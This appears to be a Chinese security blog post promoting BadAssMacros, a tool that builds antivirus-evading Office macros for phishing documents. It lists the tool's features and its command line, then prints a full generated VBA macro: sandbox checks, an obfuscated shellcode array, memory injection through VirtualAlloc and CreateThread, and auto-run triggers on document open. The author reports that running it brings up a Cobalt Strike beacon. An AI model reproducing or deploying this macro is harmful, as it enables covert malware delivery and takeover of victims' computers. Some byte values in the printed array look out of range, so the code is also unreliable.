工具推荐:BadAssMacros免杀宏生成器

admin
admin
admin
141260
文章
117
评论
2021年8月2日00:00:50评论289 views字数 4729阅读15分45秒阅读模式

    在众多的攻击方式中,钓鱼文档攻击仍然扮演者重要的地位,而随着各类安全防护设备的成熟,宏免杀一直是我们所讨论的问题,之前有MacroPack(收费版仍然好用)可以生成免杀宏文档,但特征已被标记,今天介绍的这款工具则仍然效果很好。

    

地址如下:https://github.com/Inf0secRabbit/BadAssMacros


     先来看一下免杀效果:


工具推荐:BadAssMacros免杀宏生成器


目前具有的功能如下:


  • Classic VBA shellcode injection.

  • Indirect VBA shellcode injection (using LoadLibrary).

  • Sandbox Detection.

  • VBA Purging.

  • Shellcode obfuscation.

  • Variable name Randomization.


这里我使用第一种方式进行注入


BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s classic -c <caesar_shift_value> -o <path_to_output_file>


工具推荐:BadAssMacros免杀宏生成器


生成的宏代码如下:


Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtrPrivate Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtrPrivate Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtrFunction stb() Dim qAW As Variant Dim GvH As LongPtr Dim DTc As Long Dim xiB As Long Dim fWB As LongPtr If Application.RecentFiles.Count < 3 ThenExit FunctionEnd IfSet objWMIService = GetObject("winmgmts:\.rootcimv2")Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)For Each objItem In colItemsIf objItem.NumberOfCores < 3 ThenExit FunctionEnd IfNext qAW = Array(255, 75, 134, 231, 243, 235, 203, 3, 3, 3, 68, 84, 68, 83, 85, 84, 89, 75, 52, 213, 104, 75, 142, 85, 99, 75, 142, 85, 27, 75, 142, 85, 35, 75, 142, 117, 83, 75, 18, 186, 77, 77, 80, 52, 204, 75, 52, 195, 175, 63, _100, 127, 5, 47, 35, 68, 196, 204, 16, 68, 4, 196, 229, 240, 85, 68, 84, 75, 142, 85, 35, 142, 69, 63, 75, 4, 211, 105, 132, 123, 27, 14, 5, 120, 117, 142, 131, 139, 3, 3, 3, 75, 136, 195, 119, 106, 75, 4, 211, 83, _142, 75, 27, 71, 142, 67, 35, 76, 4, 211, 230, 89, 75, 258, 204, 68, 142, 55, 139, 75, 4, 217, 80, 52, 204, 75, 52, 195, 175, 68, 196, 204, 16, 68, 4, 196, 59, 227, 120, 244, 79, 6, 79, 39, 11, 72, 60, 212, 120, 219, _91, 71, 142, 67, 39, 76, 4, 211, 105, 68, 142, 15, 75, 71, 142, 67, 31, 76, 4, 211, 68, 142, 7, 139, 75, 4, 211, 68, 91, 68, 91, 97, 92, 93, 68, 91, 68, 92, 68, 93, 75, 134, 239, 35, 68, 85, 258, 227, 91, 68, _92, 93, 75, 142, 21, 236, 82, 258, 258, 258, 96, 109, 3, 76, 193, 122, 108, 113, 108, 113, 104, 119, 3, 68, 89, 76, 140, 233, 79, 140, 244, 68, 189, 79, 122, 41, 10, 258, 216, 75, 52, 204, 75, 52, 213, 80, 52, 195, 80, 52, _204, 68, 83, 68, 83, 68, 189, 61, 89, 124, 170, 258, 216, 238, 118, 93, 75, 140, 196, 68, 187, 100, 33, 3, 3, 80, 52, 204, 68, 84, 68, 84, 109, 6, 68, 84, 68, 189, 90, 140, 162, 201, 258, 216, 238, 92, 94, 75, 140, 196, _75, 52, 213, 76, 140, 219, 80, 52, 204, 85, 107, 3, 5, 67, 135, 85, 85, 68, 189, 238, 88, 49, 62, 258, 216, 75, 140, 201, 75, 134, 198, 83, 109, 13, 98, 75, 140, 244, 75, 140, 221, 76, 202, 195, 258, 258, 258, 258, 80, 52, _204, 85, 85, 68, 189, 48, 9, 27, 126, 258, 216, 136, 195, 18, 136, 160, 4, 3, 3, 75, 258, 210, 18, 135, 143, 4, 3, 3, 238, 214, 236, 231, 4, 3, 3, 235, 165, 258, 258, 258, 50, 68, 107, 105, 81, 3, 157, 152, 102, 60, _179, 136, 116, 184, 55, 38, 239, 250, 111, 149, 90, 39, 166, 220, 17, 236, 156, 173, 190, 208, 118, 42, 257, 206, 123, 209, 43, 169, 53, 205, 216, 128, 12, 197, 242, 182, 95, 141, 121, 124, 19, 107, 29, 95, 202, 59, 153, 178, 48, 5, _145, 187, 177, 77, 21, 147, 43, 170, 168, 82, 205, 158, 16, 63, 236, 93, 13, 138, 84, 3, 88, 118, 104, 117, 48, 68, 106, 104, 113, 119, 61, 35, 80, 114, 125, 108, 111, 111, 100, 50, 55, 49, 51, 35, 43, 102, 114, 112, 115, 100, _119, 108, 101, 111, 104, 62, 35, 80, 86, 76, 72, 35, 59, 49, 51, 62, 35, 90, 108, 113, 103, 114, 122, 118, 35, 81, 87, 35, 56, 49, 52, 62, 35, 87, 117, 108, 103, 104, 113, 119, 50, 55, 49, 51, 44, 16, 13, 3, 214, 193, _208, 55, 4, 11, 192, 107, 203, 115, 147, 235, 180, 13, 143, 54, 239, 195, 106, 45, 70, 111, 186, 9, 50, 123, 33, 127, 155, 240, 94, 109, 44, 74, 215, 28, 87, 65, 234, 248, 256, 243, 98, 44, 211, 214, 183, 133, 125, 236, 179, 173, _42, 79, 178, 37, 192, 157, 121, 113, 171, 34, 186, 133, 255, 128, 215, 171, 210, 205, 146, 240, 29, 36, 48, 127, 76, 230, 26, 217, 115, 92, 25, 236, 197, 231, 257, 122, 62, 143, 244, 121, 27, 239, 38, 94, 56, 147, 243, 126, 156, 179, _56, 182, 70, 237, 65, 27, 97, 239, 200, 197, 202, 174, 144, 34, 151, 62, 49, 60, 202, 52, 98, 40, 250, 185, 239, 199, 73, 221, 9, 190, 126, 256, 79, 55, 29, 250, 163, 143, 71, 209, 165, 146, 197, 110, 170, 166, 230, 200, 159, 3, _116, 93, 9, 95, 83, 16, 158, 164, 178, 82, 59, 108, 40, 34, 85, 47, 32, 224, 108, 77, 211, 83, 65, 201, 229, 35, 220, 3, 214, 148, 211, 48, 250, 225, 80, 148, 6, 168, 36, 35, 66, 197, 200, 170, 212, 245, 149, 56, 30, 181, _21, 188, 102, 214, 68, 45, 199, 87, 53, 11, 121, 103, 133, 62, 193, 58, 25, 75, 138, 207, 190, 118, 212, 3, 68, 193, 243, 184, 165, 89, 258, 216, 75, 52, 204, 189, 3, 3, 67, 3, 68, 187, 3, 19, 3, 3, 68, 188, 67, 3, _3, 3, 68, 189, 91, 167, 86, 232, 258, 216, 75, 150, 86, 86, 75, 140, 234, 75, 140, 244, 75, 140, 221, 68, 187, 3, 35, 3, 3, 76, 140, 252, 68, 189, 21, 153, 140, 229, 258, 216, 75, 134, 199, 35, 136, 195, 119, 185, 105, 142, _10, 75, 4, 198, 136, 195, 120, 218, 91, 91, 91, 75, 8, 3, 3, 3, 3, 83, 198, 235, 162, 256, 258, 258, 52, 60, 53, 49, 52, 57, 59, 49, 52, 53, 54, 49, 52, 54, 52, 3, 84, 12, 194, 112)For i = 0 To UBound(qAW)qAW(i) = qAW(i) - 3Next iGvH = VirtualAlloc(0, UBound(qAW), &H3000, &H40)For DTc = LBound(qAW) To UBound(qAW)xiB = qAW(DTc)fWB = RtlMoveMemory(GvH + DTc, xiB, 1)Next DTcres = CreateThread(0, 0, GvH, 0, 0, 0)End FunctionSub Document_Open()stbEnd SubSub AutoOpen()stbEnd Sub


运行后,CS上线,有兴趣的可以自己去翻一翻源码。


     ▼
更多精彩推荐,请关注我们

工具推荐:BadAssMacros免杀宏生成器



本文始发于微信公众号(鸿鹄实验室):工具推荐:BadAssMacros免杀宏生成器

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月2日00:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   工具推荐:BadAssMacros免杀宏生成器https://cn-sec.com/archives/442951.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息